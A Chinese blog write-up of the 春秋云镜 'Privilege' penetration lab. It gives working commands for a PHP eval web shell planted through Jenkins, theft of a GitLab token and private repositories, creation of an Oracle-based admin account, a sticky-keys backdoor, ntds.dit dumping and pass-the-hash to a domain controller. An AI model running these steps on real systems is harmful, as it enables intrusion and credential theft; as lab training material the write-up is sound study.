春秋云镜 privilege writeup
春秋云镜 privilege writeup
flag01
fscan扫一下
8080是jenkins ,80是wordpress,并且有备份文件
发现任意文件读取
直接读flag
flag02
根据题目一些提示初始密码,并且给了jenkins数据的目录
读取密码
登上后可以发现配置有gitlab api token
jenkins可以执行命令
看一下根目录可以发现phpstudy
在WWW下写马
注意cmd的转义符是^
println "cmd /c echo ^<?php eval(\$_POST[0]);?^> > C:\\phpstudy_pro\\WWW\\1.php".execute().text蚁剑连接即可
看ip,扫内网,挂代理
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.31:135 open
172.22.14.7:139 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.31:445 open
172.22.14.46:445 open
172.22.14.11:445 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.16:8060 open
172.22.14.11:88 open
172.22.14.16:9094 open
[*] NetInfo:
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetBios: 172.22.14.11 [+]DC XIAORANG\XR-DC
[*] NetBios: 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetInfo:
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetBios: 172.22.14.46 XIAORANG\XR-0923
[*] NetInfo:
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] WebTitle: http://172.22.14.7:8080 code:403 len:548 title:None
[*] NetInfo:
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle: http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] WebTitle: http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle: http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle: http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[+] http://172.22.14.7/www.zip poc-yaml-backup-file172.22.14.11 XR-DC
172.22.14.46 80 XR-0923
172.22.14.31 1521 XR-ORACLE
172.22.14.16 80,22,9094 GitLab
172.22.14.7 XR-JENKINS 本机上面我们发现了jenkins配置有gitlab api token,我们可以利用这个
根据jenkins目录找到credentials.xml文件
参考如何从credentials.xml中解密Jenkins密码 - bestsrc
得到api token
作为请求头访问,能够查看gitlab项目结构
curl -H "Private-Token: glpat-7kD_qLH2PiQv_ywB9hz2" http://172.22.14.16/api/v4/projects[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]前两个项目是有用的,拉下来
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git在xradmin中的ruoyi-admin/src/main/resources/application-druid.yml找到oracle账号密码
然后就可以连接
但是MDUT用不了,navicat也连不上不知道为什么
最后用odat工具直接利用,命令无回显,加用户rdp上去
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user zeropeach whoami@666! /add'
proxychains4 odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators zeropeach /add'
flag03
拉取的另一个是txt文件,用户名,密码
在扫内网时我们可以看到一个XR-0923
找到对应用户,密码
cme扫一下可以rdp上去
用户可以rdp也可以winrm
evil-winrm连上,查看权限存在SeRestorePrivilege权限(rdp需要管理员权限才能看
可以IFEO提权
但用之前的方法显示无法访问
在system32目录修改程序名,达到替换的效果
只有winrm连上的才能改名,rdp的cmd也是无法访问
ren sethc.exe sethc.old
ren cmd.exe sethc.exesethc.exe 是 Windows 操作系统中的一个系统文件,主要负责启用 “粘滞键” (Sticky Keys) 功能
按五下shift即可打开
flag04
传mimikatz
用机器用户查一下spn
得到密码
发现可以evil-winrm连接
有 SeBackupPrivilege 和 SeRestorePrivilege 特权
尝试导出 sam system ntds.dit(ntds.dit只能diskshadow导出
reg save HKLM\SYSTEM system.hive复现时没有成功,就说一下操作
shadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
diskshadow.exe /s shadow.txt复制文件copy用不了,可以用robocopy
robocopy /b z:\windows\ntds\ c:\users\tianjing\ ntds.dit
secretsdump.py -system system.hive -ntds ntds.dit local最后PTH,psexec不行,用的smbexec
python smbexec.py -hashes :70c39b547b7d8adec35ad7c09fb1d277 xiaorang.lab/administrator@172.22.14.11 -codec gbk
finally
反思总结一下,本章学习了一下关于jenkins和gitlab作为项目的渗透
对于内网知识的话,主要还是对用户的权限不熟,不懂SeRestorePrivilege权限可以IFEO提权(虽然最后是直接改文件名
还有就是导出密码相关文件,又了解了使用diskshadow导出ntds.dit
感觉个体难度不高,但是混合起来就有点晕晕的
春秋云镜 privilege writeup
https://zer0peach.github.io/2024/12/27/春秋云镜-privilege-writeup/